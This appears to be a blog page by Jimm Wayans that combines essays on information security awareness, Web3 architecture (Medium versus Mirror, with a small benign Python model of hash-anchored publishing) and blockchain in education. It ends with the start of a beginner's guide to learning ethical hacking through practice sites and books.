Jimm Wayans

Talking about Information Security Awareness

Information Security Awareness

In today’s society, with the rapid development of new-generation information technologies such as artificial intelligence and big data, people’s lives have become more convenient and faster. However, while we enjoy this technological life, we often do not realize that we have been exposed to dangers such as information fraud, information capture and information harassment. Compared with the traditional means of fraud, today’s criminals take advantage of the efficiency of technology and of network security loopholes to carry out fraud, making it even more difficult for people to guard against. Some small negligence in daily life may be enough to cause personal information leakage and create information security risks.


Informatization has changed people’s work, study and living habits, making people more dependent on computer networks. While enjoying the various conveniences it brings, people often lack information security awareness and neglect information security safeguards. Information security awareness is gradually established through knowing and understanding information security. This post analyzes and discusses the connotation of information security awareness and the current state of information security development, and puts forward effective measures to strengthen information security awareness.

The importance of information security

Information security is the cornerstone of informatization construction and the guarantee for the normal and effective operation of information networks. It has become an overall problem affecting national security, social stability and economic development. A country’s ability to obtain information and ensure information security is a symbol of comprehensive national strength, economic competitiveness and viability in the 21st century, and a trump card in future international competition. The development of society and the arrival of the digital network era have changed many aspects of people’s lives: bank deposits and withdrawals at any branch and in any location, surfing the Internet, online shopping and online transactions all bring convenience. But while computers and networks bring convenience and speed, they also impose new conditions. Nowadays people carry less cash and more cards of various kinds, such as bank credit cards, medical and social security cards and salary cards. These cards really are convenient, but precisely because of that convenience, when a card is used the computer system only recognizes the cardholder and cannot identify the real owner of the card. So, for the safety of the information on the card, people have to set passwords and similar protections for their various cards. This is an information security issue: people set various passwords for the security of their information.

With the development and popularization of the Internet, network viruses, network attacks and network crimes have rapidly reached an unprecedented level. Today’s viruses can spread across the world within ten minutes, disrupting the global economy in an instant. Network security has become the focus of global attention, and hackers and computer viruses threaten the normal operation of all kinds of departments. As people increasingly rely on computer networks, they find that the network is fragile. Therefore, information security has received more and more attention all over the world, and it has become an important yardstick for measuring whether an information system is complete.

The International Organization for Standardization (ISO) defines information security as “technically and managerially established security protection for data processing systems to protect computer hardware, software and data from damage, change and disclosure due to accidental and malicious reasons”.

Main content of information security

The main contents of information security include: confidentiality, integrity, availability, authenticity and validity.

Information security mainly refers to maintaining the confidentiality, integrity and availability of information: using computer software and hardware technology, network technology, cryptographic (key) technology and other security technologies, together with various organizational and management measures, to protect information throughout its life cycle, so that its confidentiality, integrity and availability are not destroyed at any stage of generation, transmission, exchange, processing and storage.

Confidentiality means ensuring that only those who have been granted specific permissions have access to information. The confidentiality of information varies according to the number of subjects that are allowed to access it: information that everyone can access is public information, and information whose access must be restricted is sensitive or secret information. According to the importance of the information and its confidentiality requirements, information is divided into different levels of confidentiality; internal military documents, for example, are generally divided into three levels: secret, confidential and top secret. Authorized users can operate on confidential information according to the rights they have been granted: some users can only read information, and some can both read and write.

Integrity of information means ensuring the correctness and completeness of information and of processing methods. On the one hand, information integrity means that no tampering, loss of information or erroneous information occurs while information is being used, transmitted and stored; on the other hand, it refers to the correctness of information processing methods, since improper operations may cause the loss of important files or even paralysis of the entire system.

Availability of information refers to ensuring that authorized users can indeed access the information they need when they need it; that is, information and related information assets can be obtained immediately when an authorized person needs them. For example, interruption of communication lines and network congestion cause information to be unavailable for a period of time and affect normal business operations; this is a destruction of information availability. Systems that provide information must be able to withstand attacks appropriately and recover from failures. In addition, the authenticity and validity of information must be guaranteed, that is, business transactions and information exchanges between organizations, or between organizations and their partners, must be trustworthy.

Information Security Development Status

Information security can be regarded as an emerging industry in the process of China’s informatization construction. In general, the development trajectory of information security includes the following three stages:

⑴ The budding stage

Before 2005, industries and departments in China began to develop awareness of information security: from the initial “emphasis on information construction” while “ignoring the construction of security systems”, to “awareness of the importance of security” and the “hope to realize information security”, but still regarding information security as very mysterious and not knowing where to start. At this stage, customers in various industries were consciously learning and accumulating information security knowledge and conducting extensive exchanges with authorities in the field to understand their technologies, concepts, products and services. At the same time, some small-scale and sporadic information security construction appeared in some enterprises and departments, but it did not achieve scale or systematization. Moreover, for information security in this period the government’s macro-policy consisted mostly of appeals, with relatively few specific matters actually promoted. Although it all seemed very lively, there was very little actual information security construction.

⑵ The outbreak stage

After 2005, the needs of domestic industries and departments for information security construction changed from “spontaneous” to “conscious”. Customers had basically understood the content and significance of information security construction, and many industry departments began to plan and deploy internal information security construction. Leaders of various industries attached great importance to it and continued to increase investment, so information security became the top priority of this phase of construction. In a sense, the explosion of demand in the information security market can be said to have been caused by the “debts” that various industries had accumulated in information security over the years.

⑶ The popularization stage

When information security construction is integrated with the overall information construction of various industries, information security becomes one of the key links in IT construction. It is as important and ubiquitous as air, but just as easily overlooked.

In the next 3 to 5 years, the information security market will maintain high-speed, super-scale development, and telecommunications, government and finance will be the industries with the greatest demand for information security. The telecommunications and financial industries involve large investment, fast development, a high degree of informatization, complex needs and a relatively severe security situation, while government departments, because of their high position and urgent security needs, act as a role model to the outside world; all of them will therefore increase their investment in information security.

The biggest security issue of the 21st century is information security, together with the economic, political, military, social, technological and cultural security that rest on it. The weakest link in information security is likely to be careless people, not software bugs. Hackers have compromised many extremely complex networks not only by relying on superb technology but also by exploiting human weaknesses. Only by raising people’s security awareness to a very high level can we fundamentally reduce information security risk.

Effective Measures to Improve Information Security Awareness

A good information security environment is needed to further deepen reform and opening up and promote China’s socialist modernization, and it is also the foundation of national security. The premise of a good information security environment is that all citizens have a strong awareness of information security and a high degree of vigilance in protecting sensitive national information.

1. Improve the information security awareness of leading cadres

Leading cadres at all levels are not only the main generators, transmitters, users and keepers of sensitive information, but also the main targets of those who steal it. Therefore, in improving information security awareness, the information security quality of leading cadres at all levels is particularly important. Only when leaders raise their own awareness of information security will they take information security work seriously, strictly implement the relevant laws and regulations, and strictly organize and carry out information security inspections, and only then can information security work be effective and well done.

2. Improve the information security awareness of confidential personnel

Secret-related personnel are important managers of secret information security and are responsible for sending, receiving and keeping confidential information. Building a strong team of secret-related personnel and improving their quality is the key to doing a good job in information security. To improve the quality of secret-related personnel, in addition to improving their ideological understanding, cultivating a scientific and rigorous style of work, and strictly abiding by laws, regulations and various rules, professional training on information security and confidentiality under high-tech conditions is required. This enables them to master the use of modern technical tools for managing documents and archives, to be familiar with their own business, to have keen judgment and insight into phenomena that may cause leakage of secrets, and to master a certain level of anti-theft technology.

3. Improve the information security awareness of professional and technical personnel

Professional and technical personnel are the new force of information security management in China and the operators and maintainers of information security. They must have sufficient information security knowledge, fully understand the security properties of the relevant security technologies, operating systems and application software, keep track of security news and developments in security technology, and develop good information security habits. The government should actively promote exchanges between China’s information technology professionals and foreign countries on cultivating information security awareness. Learning from successful foreign experience, using foreign research results, drawing on foreign educational strength, and introducing excellent foreign teaching materials and related theories is a shortcut to rapidly improving the level of information security awareness training for professional and technical personnel in China.

4. Raise the awareness of information security of the whole people

In order to enhance citizens’ awareness of information security and improve national information security awareness, information security education must be carried out for the whole people. To ensure the security of the party’s and the state’s secrets under any circumstances, the most fundamental thing is to do a good job of ideological education and improve the information security awareness of the whole people. All industries and government information management departments at all levels should use public opinion and the media to publicize the importance of information security; compile information security knowledge manuals to strengthen self-protection capabilities; establish a set of security training systems for users at different levels, gradually improving the technical level of computer users through tiered training; and organize the study of laws and regulations on information security work, popularize information security common sense, and introduce information security technologies. Only when the information security awareness of the whole people is enhanced will information security be fully guaranteed.

What is Web3

First, let’s look at the previous generations:

Web 1.0 (1980-2000)

The first wave of the Internet began in the 1980s; its iconic event was two computers “communicating” through a shared protocol. That protocol is TCP/IP, created in 1983.

The World Wide Web of this period could not do much “interconnecting”; most information was read-only.

Netscape is typical of this period: publishing information on the Internet.

The network of this period had the following pain points:
  • High technical barriers to access
  • No function for indexing information
  • No interaction with users and no recording of user data

Web 2.0 (2001-present)

After the dot-com bubble burst in 2000, a second wave began to sprout. Many companies began to address the pain points of the Web 1.0 model, including search functions and allowing users to upload content.
The Web 2.0 products that emerged at this time were more interactive: users could create, upload and share their own content.
Examples include Google and Microsoft building their Gmail and Outlook products on top of SMTP (Simple Mail Transfer Protocol, from 1981). While the SMTP protocol itself is open and transparent, Gmail and Outlook are closed platforms owned by the two tech giants. Therefore, the software that Web2 users actually interact with is the product that these giants built on top of the open source software of Web1.
Facebook (now renamed Meta) is a typical Web2 technology giant. It creates wealth by letting users read, write, interact and socialize on its platform, accumulating a large amount of data and traffic.

Web 3.0 (concept was born in 2014)

Web 3.0 (hereinafter Web3) was first proposed by Gavin Wood, co-founder of Ethereum, in 2014, and suddenly attracted everyone’s attention at the end of 2021.
Web3 combines the characteristics of Web1 and Web2: a transparent, open and open-source network in which users can read, write and upload content, and can also exchange value.
Conceptually, Web3 represents the next era of the Internet, in which the Internet shifts towards a more democratic paradigm. Web3 also stems from a change in people’s attitude towards the value of today’s Internet: the giants of Web 2.0 control the Internet and everyone’s data, so many people want to create an Internet that is truly “collectively owned”.
The core of Web3 is to allow users not only to read and write content but also to own it, so that they are not at the mercy of centralized technology companies arbitrarily changing the rules. Web3 restores the openness of Web1, with standardized rules for all market participants, so that giant companies cannot stifle innovation and market competition.
The corporate form under Web3 has also changed:

Comparison of Web2 products and Web3 products

Next, let’s compare two content creation products (Medium and Mirror) to see the differences between Web2 and Web3 products.
Medium
Medium is the world’s top content creation/blogging platform (somewhat similar to Zhihu in China, but with better content quality). Its founder Evan Williams is also a co-founder of Twitter and Blogger. As of May 2021, the platform had 180 million monthly active users and 750,000 paid subscribers.
Compared with traditional blogging platforms, its biggest feature is a refined writing and reading experience, while content is mainly shared and disseminated along users’ social relationships.
Creators do not pay any fee to upload their work, but if they want to earn income from content they need to place it in the paywall section.
Readers can read general content for free, but need to pay a membership fee of $5 per month or $50 per year to read content in the paywall section.
Medium distributes readers’ membership fees to the authors of the articles those readers read, in a ratio calculated from reading time. The monthly income of top content creators may exceed 50,000 US dollars. The platform also gives top creators additional monthly subsidies to encourage them to keep producing high-quality content and to grow their fan base.
Medium is currently valued at $600 million; its most recent financing was $57 million in January 2021 from A16Z and Google.
Mirror (mirror.xyz)
Mirror is a blockchain-based content creation platform whose mission is to “revolutionize the way ideas are expressed, shared, and monetized.” Anyone with an Ethereum wallet can access the platform to create and earn. Its goal is to give content creators a way to publish their work confidently and securely while retaining control over their digital rights.
Mirror was founded by Denis Nazarov, a former partner of A16z (also an investor in Medium). It received a US$10 million investment from Union Square Ventures in July 2021 and is currently valued at US$100 million.
As of March 2022, Mirror had raised more than 8,000 ETH (approximately $24 million) for content creators.
The following figure (not reproduced here) shows the Mirror interface after connecting a wallet.
Mirror currently provides basic functions for creators, including publishing articles (Entry Editor), crowdfunding (Crowdfunds), digital collectibles (Editions), auctions (Auctions) and splits (Splits).
Crowdfunding: Anyone can initiate or participate in crowdfunding through Mirror. Supporters deposit ETH to fund the initiator and receive tokens in exchange; any project or idea can be capitalized (tokenized). Many writers have launched crowdfunding projects on Mirror, using future copyright/royalty income to obtain funds now to sustain their creative work and their lives.
Digital collectibles (NFT): Any content published on Mirror can be made into an NFT after paying a handling fee.
(NFT stands for non-fungible token. Traditional cryptocurrencies are fungible tokens: there is no difference between any two tokens, they can replace each other, and they can often be split into smaller units; Bitcoin is an example. An NFT is unique, cannot be replaced by another NFT, and usually cannot be divided into smaller units; for example, an NFT of a painting represents that painting itself and cannot be replaced by any other NFT. Blockchain technology is a decentralized digital ledger technology, and NFTs are a way of digitizing assets on top of it. In practice, NFT does not refer to one specific form of digital asset; on the contrary, its scope is very broad and can take any form you can imagine, such as pictures, music, videos, online collectibles or even a tweet. Every creation, modification and transaction of these NFT digital assets is recorded on the blockchain’s digital ledger.)
Auctions: NFT auctions are supported on Mirror.
Splits: A split on Mirror is an automatic way to share the value you generate with multiple parties. It is a payable smart contract that forwards value to multiple addresses on Ethereum. A split can be a way to reward your collaborators and the people who inspire you, or to donate the proceeds of your work.
In terms of product form, the Mirror platform is more like a content crowdfunding platform: the digital content published on it is given value through NFT tokenization, and the ownership of a single piece of content can be sold to multiple named investors through crowdfunding.
The set of tools Mirror provides for content creators raises “content monetization” to a new level; there may even be specialized content investors who earn future profits through a keen sense for high-quality creators.
At the same time, the Mirror platform uses blockchain technology to address the following problems:
  • Content is censored and deleted
  • Malicious comments
  • The content is randomly quoted or plagiarized
  • The economic interests of creators are determined by the platform
Exclusive ENS domain name: Mirror does not require logging in through an email or other account; instead it integrates the decentralized domain name service ENS* to identify the creator, and each creator’s mirror.xyz subdomain serves as the home page of their own content publishing space.
(Note: ENS, the Ethereum Name Service, provides human-readable name resolution for blockchain addresses, Web3 storage resources and even social information in a decentralized form, and is the most widely integrated blockchain naming standard.)
On-chain signature: After an entry has been signed and confirmed, three pieces of data are shown at the bottom of the content page (as in the figure above): the “Arweave* Transaction ID”, the “Contributor Ethereum Address*” and the “Content Summary”. All of this information is publicly viewable on the blockchain, so anyone can verify whether an item of content was written by a specific Ethereum account. Every published entry and every change to its content must be signed by the user with their signing key and then published, with the data stored on Arweave.
(Note: Arweave is a decentralized cloud storage solution that aims to use blockchain to disrupt the traditional storage market. Unlike other cloud storage solutions, Arweave not only has the security advantages of decentralized storage but also lets users choose a one-time, permanent storage service. Ethereum is a decentralized, open-source public blockchain platform with smart contract functionality. An Ethereum address represents an Ethereum account; for external accounts, the address is the last 20 bytes of the account’s public key, written in hexadecimal and usually starting with 0x, for example 0xcd2a3d9f938e13cd947ec05abc7fe734df8dd826. Once content has been sent to Ethereum it can no longer be deleted or tampered with.)
Compared with the architecture of Medium, Mirror is content-centric.
The browser resolves the content hash through the blockchain’s domain name system (ENS), then fetches the web application itself from a decentralized storage system (Arweave). When the user interacts with the page, it does not send requests to a specific application server (there is no Google server and no Medium server); instead it reads from and writes to a decentralized storage system or an indexer.
Let’s take a closer look at the differences between the two product architectures.
Medium (Web2 product)
1. Front end: For the web, the front end is the part of a website the user sees, including its presentation layer and structural layer: the structure of the web page, its visual appearance, and the implementation of its interactions.
Front-end code (usually written in JavaScript, HTML and CSS) defines a product’s user interface logic, such as what the Medium website looks like and what happens when a user interacts with elements on the page (buttons, status bar, small icons and so on).
2. Back end: The back end mainly interacts with the database and processes the corresponding business logic. It has to consider how to implement functions, data access, platform stability and performance.
The back-end code (written in languages such as Node.js, Java or Python) must define the business logic of the Medium website very precisely: for example, how the website responds when a new user signs up, publishes a new blog post, or comments on someone else’s post.
3. Database: The website must have a database for storing its data, also called the data space.
Most websites today are dynamic websites developed with ASP and PHP, and their data is stored in a dedicated database. Data can be published to the database through the website’s back office, and the website then reads that data. To store user information, user uploads, tags, comments, likes and so on, the database has to be updated constantly.
Take Medium as an example: a user tries to log in to Medium and upload content. The user enters a user name and password on the front end/client, which sends an HTTP/HTTPS request to the back end/server. After receiving the request, the back end queries the database to check whether the user name and password are correct, and the database returns the result together with the user’s other information. The back end then sends an HTTP/HTTPS response to the front end, which renders it on the page. All of this code is hosted on centralized servers and delivered to users through their browsers.
Mirror (Web3 product)
1. Signature: The first difference of Web3 products is the front-end login method, users do not need to have a set of account and password system.
Similar to how Google allows users to access various applications without creating multiple accounts, crypto wallets can have a similar function in web3. Crypto wallet users can connect to the decentralized protocol at any time and start using it without submitting personal information or registering an account. Web3 applications do not need to call the database (web3 does not have such a centralized database) to read user data, because all user data is public on the chain. Users need to link a wallet (the web page is a browser extension, and the mobile terminal is a separate app), and sign a transaction to log in.
2. Front-end: The front-end user experience is not much different from Web2, but the front-end code is stored on a decentralized server.
3. Node management: Mirror runs on a decentralized network like Ethereum, and each node in the network keeps a copy of all states on the Ethereum state machine, including codes and data related to each smart contract. For the front end to communicate with the smart contract and make function calls, it needs to interact with one of the nodes.
This is because any node can broadcast a request to execute a transaction on the EVM (Ethereum Virtual Machine). Therefore, in addition to building a set of Ethereum full nodes by yourself, you can also use API services provided by third-party service providers to interact between the front end and smart contracts.
4. Virtual machine: The virtual machine is the core module in the Web3 architecture. Different from Web 2 applications, Web 3 has no background and database, and does not require a centralized web server to store back-end logic.
A virtual machine (Virtual Machine) simply refers to a code running environment built on a decentralized blockchain. At present, the mainstream ones on the market are the Ethereum Virtual Machine (Ethereum Virtual Machine, EVM) and the Ethereum-like virtual machine. Based on the Account model, it runs the smart contract code internally in a completely isolated manner from the outside, realizing a Turing-complete smart contract system. Ethereum requires thousands of people running a piece of software on their personal computers to power the network. Each node (computer) in the network is used to run the Ethereum virtual machine. Think of the EVM as an operating system that understands and executes software written in a specific programming language on Ethereum. EVM assumes the responsibility of database + backend within the Mirror product architecture, data is stored on the chain, and smart contracts process the data.
5. Smart contract: a program that executes code on the blockchain when certain conditions are met, and the parties approve and maintain its operation by digitally signing the contract.
The smart contract is actually the same piece of code stored in the blockchain (each node). This code defines the rules of the contract. When the input meets the required conditions, the smart contract code in each node will be automatically executed independently, and Automatically cross-check that all execution results are the same.
6. External storage: Because of the ledger synchronization property of the blockchain, the storage on the chain is very expensive, so most of the data that takes up space and is not the most important will be stored on a third-party decentralized storage platform such as IPFS/Swarm /Arweave.
Take Mirror as an example: the user connects a wallet through the browser interface, writes an article, signs it with the wallet and sends the transaction to the chain. The article itself is sent to Arweave through Mirror's backend (at the time of writing, Mirror pays for users' Arweave uploads from a centralized account). A transaction containing the Arweave transaction information is then submitted to Ethereum for packaging.
Throughout, the wallet talks to a provider to connect to Ethereum, and Mirror's own server also sends and queries transactions through a provider and feeds the results back to the front end.
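To make the security property of this flow concrete, here is a simplified model of it, added as an illustration and not Mirror's, Arweave's or Ethereum's code. The chain and the external store are in-memory dictionaries, the storage ids are made up, and the wallet signature is an HMAC over the content digest standing in for the wallet's ECDSA signature (the Python standard library has no public-key primitives). What it shows is real: the chain holds only a small anchor record, and a reader trusts the off-chain article only after re-hashing it and checking it against that anchor, so a host that edits the stored copy is caught.

```python
"""Simplified model of the Mirror publishing flow: article off-chain,
anchor (storage id, digest, signature) on-chain, verification on read.
Constructed example; the chain, store, ids and signature are stand-ins."""
import hashlib
import hmac

EXTERNAL_STORAGE = {}   # storage id -> article bytes (Arweave/IPFS stand-in)
CHAIN = []              # list of anchor records (Ethereum stand-in)


def content_digest(data):
    return hashlib.sha256(data).hexdigest()


def wallet_sign(author_key, digest):
    # Stand-in for the wallet's signature; binds the author's key to the digest.
    return hmac.new(author_key, digest.encode(), hashlib.sha256).hexdigest()


def store_offchain(article):
    # Constructed storage id. Real Arweave ids are transaction ids, not content
    # hashes, which is exactly why the digest must be anchored as well.
    storage_id = "ar-%04d" % (len(EXTERNAL_STORAGE) + 1)
    EXTERNAL_STORAGE[storage_id] = article
    return storage_id


def publish(author, author_key, article):
    """Store the article off-chain and anchor (storage id, digest, signature) on-chain.
    Returns the index of the anchor record."""
    digest = content_digest(article)
    record = {
        "author": author,
        "storage_id": store_offchain(article),
        "digest": digest,
        "sig": wallet_sign(author_key, digest),
    }
    CHAIN.append(record)
    return len(CHAIN) - 1


def fetch_and_verify(index, author_key):
    """Read the anchor, fetch the blob, and accept it only if the blob hashes to
    the anchored digest and the signature over that digest checks out."""
    record = CHAIN[index]
    blob = EXTERNAL_STORAGE.get(record["storage_id"])
    if blob is None:
        return None                  # storage lost it; the anchor still proves it existed
    if content_digest(blob) != record["digest"]:
        return None                  # off-chain content was altered
    expected = wallet_sign(author_key, record["digest"])
    if not hmac.compare_digest(expected, record["sig"]):
        return None                  # anchor was not produced with this author's key
    return blob


def demo():
    """Publish, verify, then let the storage host edit the copy and verify again."""
    key = b"author-key-constructed-for-example"
    idx = publish("alice", key, b"First post on Mirror")
    before = fetch_and_verify(idx, key)
    EXTERNAL_STORAGE[CHAIN[idx]["storage_id"]] = b"First post on Mirror (edited by host)"
    after = fetch_and_verify(idx, key)
    return before, after
```

The point of the model is the order of trust: the on-chain record is what the reader believes, and the off-chain blob earns trust only by matching it. The same applies to any pinning service or gateway in front of IPFS or Arweave.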
 

Summary

By comparing the two products, Medium and Mirror, we can see that blockchain combined with distributed storage provides a commercially feasible technical solution for transparency and tamper resistance of information.

As an emerging concept, Web 3 is still at an early stage of development. At the architectural level it clearly requires a new set of infrastructure, products and services, from the underlying network stack to the consensus model and the virtual machine.
Although there are also challenges at the regulatory level, compared with Bitcoin the narrative and positioning adopted by Web3 is politically moderate, more pragmatic and easier for the mainstream to accept.
Application of Blockchain Technology in Education and Other Sectors

Blockchain technology is regarded as another disruptive technology after cloud computing, the Internet of Things and big data, and has drawn strong interest from governments, financial institutions and enterprises. Essentially, it is a technical scheme for maintaining a reliable database through decentralization and high trust. Its core technologies are distributed ledgers, asymmetric cryptography and smart contracts, and its distinguishing characteristics are decentralization, consensus mechanisms, traceability and high trust. Today, as the underlying technology of Bitcoin, blockchain technology is not only applied in finance but also has great potential in education.

What’s more, blockchain technology is expected to play an important role in building an "internet + education" ecosystem and promoting reform of the education system. Drawing on the experience of blockchain in finance, its application in education falls mainly into six areas: building individual knowledge on big data, creating intelligent education platforms, developing degree certificate systems, constructing a new ecosystem of open educational resources, achieving "self-organized" operation of networked learning communities, and decentralizing the education system.

As seen:

  • In finance, global banking giants have formed the R3 consortium, with more than 40 large international financial institutions including HSBC, UBS and Bank of America, to develop blockchain technology jointly. In the United States, Nasdaq took the lead with Linq, a securities trading platform based on blockchain, an important milestone in the decentralization of the securities market. Clearly, the impact of blockchain and related technologies on the financial sector deserves close attention.
  • In technology, IBM and The Linux Foundation established Hyperledger Fabric, a dedicated open-source blockchain project that has entered substantive development. IBM also offers the Watson API on its Watson IoT platform to help enterprise customers and developers build and test cloud-based IoT applications, with the aim of using blockchain to let IoT devices operate autonomously.
  • In energy, companies abroad have launched energy blockchain projects: Germany's Siemens has partnered with a New York start-up to apply blockchain to the microgrid power trading market, and US energy company LO3 Energy and blockchain developer ConsenSys built TransActiveGrid, an interactive grid platform based on a blockchain system, for a small number of residents in the Gowanus and Park Slope neighbourhoods of Brooklyn, New York.
  • In food, a research report from the University of Saad in the United Kingdom argued that applying blockchain to the food supply chain, by making food data transparent, could reduce food waste. Walmart is also trialling blockchain to record the provenance of food so that consumers have more information about it, aiming to curb some of the current disorder in the food industry.
  • In medicine, Philips and Tierion have partnered so that Philips can use blockchain to authenticate medical records and protect patient privacy. Blockchain can help with the large-scale data quality problems the medical industry suffers from by providing a single authentic source of data, so that systems no longer suffer from human error or manual data reconciliation, addressing the problem of trust in medical data.

Enlightenment on the application of blockchain in the field of education

The application of blockchain technology is bringing disruptive change to the financial sector and creating new business opportunities. Studying how blockchain is applied in finance shows that its value for innovation there lies mainly in: eliminating intermediary trading platforms and reducing transaction costs; achieving real-time settlement and improving transaction efficiency and asset utilization; storing transaction data in a distributed, tamper-resistant and highly secure form; and automating the transaction process through smart contracts. These application scenarios and models offer the following lessons for education:

(1) Strengthen the protection of intellectual property rights and build an educational trust system. The traceability of digital currency can reduce a bank's spending on compliance checks and audits such as anti-money-laundering and anti-fraud, and helps curb illegal activities such as tax evasion and money laundering. In education, the same traceability can be used to protect the copyright of educational assets and intellectual output and to settle intellectual property disputes at the source. In addition, digital currency stored on a blockchain enjoys high security and reliability. In education, important information such as student grades, personal files and academic certificates can be anchored on the blockchain to prevent it from being lost or maliciously tampered with, building a safe, credible and tamper-resistant student credit system that helps address the current lack of student credit records and global academic fraud. In practice only hashes or encrypted records should be written to the chain, because anything placed on a public ledger cannot later be removed.

(2) Optimize educational business processes to achieve efficient, low-cost transactions in educational resources. In cross-border payment, blockchain uses decentralization to dispense with intermediary banks and achieve fast, low-cost peer-to-peer payments. In educational resource sharing, distributed ledger technology can connect users directly to resources, simplifying operations and raising the efficiency of sharing, thereby promoting open sharing of educational resources and breaking up resource islands. In educational resource transactions, decentralization removes the intermediary platform and connects consumers directly to resources, reducing costs, simplifying procedures and creating an efficient, low-cost trading platform for educational resources.

(3) Use decentralization to build a decentralized education system. In supply chain finance, blockchain removes intermediary transaction agencies and reduces human intervention, lowering costs and operational risk. Wave reached a cooperation agreement with Barclays to put the letters of credit, bill of lading numbers and documents of the international trade process on a public chain, where they are authenticated and verified as untampered, establishing fully transparent "rules of the game" and decentralizing the verification rules themselves. In education, blockchain can be used to develop a decentralized education system that breaks the monopoly of schools and government agencies over educational services, so that any qualified institution can provide education and issue valid academic certificates. Integrating formal and non-formal education in this way promotes a reform of the education system in which everyone can participate.

(4) Distributed storage and recording of credible learning data to connect schools and enterprises efficiently. Blockchain makes the securities market more open, transparent, green, fair and efficient, turning a model that depended heavily on intermediaries into a decentralized, flat network transaction model with distributed storage and recording of data. In education, students' personal information, academic performance, growth records and other content can be stored in the same way, distributed across the education system and shared with other schools or recruiting units while its authenticity and security are assured, serving as an important basis for job interviews. Distributed ledgers let students show employers their academic achievements and professional skills, building a bridge between students and enterprises and a new model of school-enterprise cooperation that connects students and employers efficiently.

(5) Develop educational smart contracts and build a new mode of operating network resources and platforms. Smart contracts can automate the many manual and semi-manual verification and management tasks in today's financial transaction processes and make transaction systems more intelligent. In building open educational resources, the transparency and automatic execution of smart contracts can automate the uploading, certification, transfer and sharing of resources, cutting the cost and raising the efficiency of sharing, and creating a new form of network resource circulation. Smart contracts can also be used to build an efficient, intelligent online learning community that runs as a "self-organization", monitoring the community in real time, automatically blocking and removing inappropriate speech, and fostering a positive atmosphere.

Challenge of Using Blockchain in Education

Blockchain achieves a degree of anonymity by separating a transaction address from the real identity of its holder, which limits the privacy exposure created by transparent transaction data. That protection is incomplete, however: by observing and correlating block data and user identifiers, an observer can still track down a user's personal information. Applying blockchain in education therefore risks leaking the privacy of teachers and students in two main ways. First, all transaction information is open and transparent, so anyone can query and track it and infer or predict the status and behaviour of teachers and students. Second, the security of a blockchain rests on its algorithms: in theory data can only be altered if an attacker controls more than half of the network at the same time (the "51% attack"), but as mathematics, cryptography and computing advance there is no guarantee that today's algorithms will not be broken in future, which could expose teacher and student information.

Twitter: @jimmwayans | www.jimmwayans.com

How to be a Hacker

How to be a Hacker or a Cybersecurity Expert?

So you want to be a Hacker?

Recently I’ve been reading a ton of questions, posts and general discussion about getting into the ‘Information Security’ game, and in my opinion at least it’s typically followed up by a fair amount of misleading information. That might be a little harsh considering I’m sure it’s well intentioned; it’s also even possible that the advice worked for them (there is no one-size-fits-all advice), but I thought I’d lay my thoughts out here in the hope of helping a new budding hacker or infosec enthusiast move forward.

I want to play sport, where should I start?
This vague, open-ended and very ambiguous question is very similar to someone asking how they should go about getting into information security. The first thing to realize is that there is a huge range of information security fields, and within each of those huge fields is a lifetime’s worth of learning content. Just like picking a sport there is no ‘best’; there are simply areas you may enjoy more than others. Off the top of my head here are some example areas, by no means exhaustive:

  • Web Application Security
  • Mobile Application Security
  • Reverse Engineering
  • Malware Reverse Engineering
  • Cloud Security
  • Network Security
  • Incident Response
  • Hardware Hacking
  • IoT Hacking
  • Risks, Governance and Compliance
  • Programming / Creating Tools for Others
  • Exploit Development
  • Forensics
  • etc…

 

Some of these are more technical in nature while others have a more theoretical focus. I guarantee that whatever you like, there are others out there who will find it boring, just as you sometimes will with what others are interested in. Right now it’s expected that if you’re reading this you may know very little about any of these areas, but what’s important is your willingness to learn and what type of motivation you have.

The Hacking Type
One trademark that is almost universal among people throughout those fields is their focus on independent, self-directed learning. Unfortunately in some ways security is still considered a ‘dark art’; I mean, why would anyone want to know how to break into a computer system unless they were going to do so? As a result plenty of people will show anything from disdain to outright hostility when asked security-related questions, under the false (perhaps sometimes true) assumption that it’s merely a ‘script kiddie’ looking to learn to hack systems instead of wanting to learn and use that knowledge for a good purpose. It’s also a fact that the ‘learning’ resources of information security are quite disjointed, with no real central repository of learning material.

The point of highlighting this is that if you wish to prosper and successfully enter the information security field you should be prepared to jump in and find your way without waiting for someone to hold your hand and lead you down the right path. Google some of the above terms and see what sounds like fun. Despite what sometimes seems like a constant battle to find the ‘best’ field to learn, or the ‘best’ resource, or the ‘best’ way to learn, often more time is spent procrastinating over these questions than dedicating the time to actually learning. Look up videos on YouTube for hacking examples – it’s ok if you don’t know what a lot of it means, but write down a list and then google those terms. Use points of interest to spawn an ever-increasing web of knowledge around topics you’re interested in.

Do I need to learn X first?
Of course you need to have full knowledge of the OSI model before you begin. Yes, you need to read that 1000-page book on the TCP protocol. Yes, you need to be proficient in 5 programming languages (at least!) before you consider hacking. Can you compile your own Linux kernel from source code? No? Don’t bother learning hacking. Actually… all that is rubbish, yet it’s one of the most common responses given to people looking to learn information security. There is one requirement to becoming a decent hacker – interest. The difference between a future hacker and a script kiddie isn’t knowledge, it’s the willingness to learn.

As long as you have a vague idea of how to use a computer you’re at a starting point you can work with. Yes, if you don’t have a solid understanding of how TCP works you should have that on your to-do list to look up when someone is talking about it in a hacking tutorial – but it’s ridiculous to think you need a ton of prerequisite knowledge before you’re allowed to start learning about topics you’re interested in. When you’re looking up how that login puzzle works on a hacking site and it uses JavaScript, you’re going to learn how JavaScript works. When you read through how a buffer overflow works and it has a Python template, you’ll learn some basics of Python. No, you won’t get a job as a developer in those languages at the end of it, but you’ll pick up the common ways to break the language.

Informal Learning
“Ok, I get the hint – I need to learn things myself, but can you at least give me a starting point?”

Sure, there are a ton of great free or cheap resources out there to get started depending on what topic appeals to you. Here are some examples.

Web Application Security

  • HackThisSite – Good for some basic web based challenges (link)
  • Enigma Group – Similar to Hack this site (link)
  • Hack The Box – A massive, online cybersecurity training platform (link)
  • OWASP Top 10 – Idea of what are the most common vulnerabilities (link)
  • TryHackMe – a free online platform for learning cyber security (link)
  • OWASP Broken Web Apps – A virtual machine you can load up to practice hacking skills on your own network (link)
  • Pentesting Lab – Another web focused virtual machine (link)
  • In fact anything from vulnhub that interested you is good (link)
  • The Web Application Hackers Handbook – The book on web hacking and vulnerabilities (link)

 

Reverse Engineering / Malware Reversing

  • Lena’s Tutorials – Known as pretty much one of the best introductions to reverse engineering (link)
  • The Legends of Random – Again another solid set of tutorials for reverse engineering (link)
  • Reversing: Secrets of Reverse Engineering – A good book on the foundations of reverse engineering (link)
  • Practical Malware Analysis – A great book focusing on reversing malware (link)
  • Malware Analysts Cookbook – Another book focusing on reversing malware (link)

 

Network Security

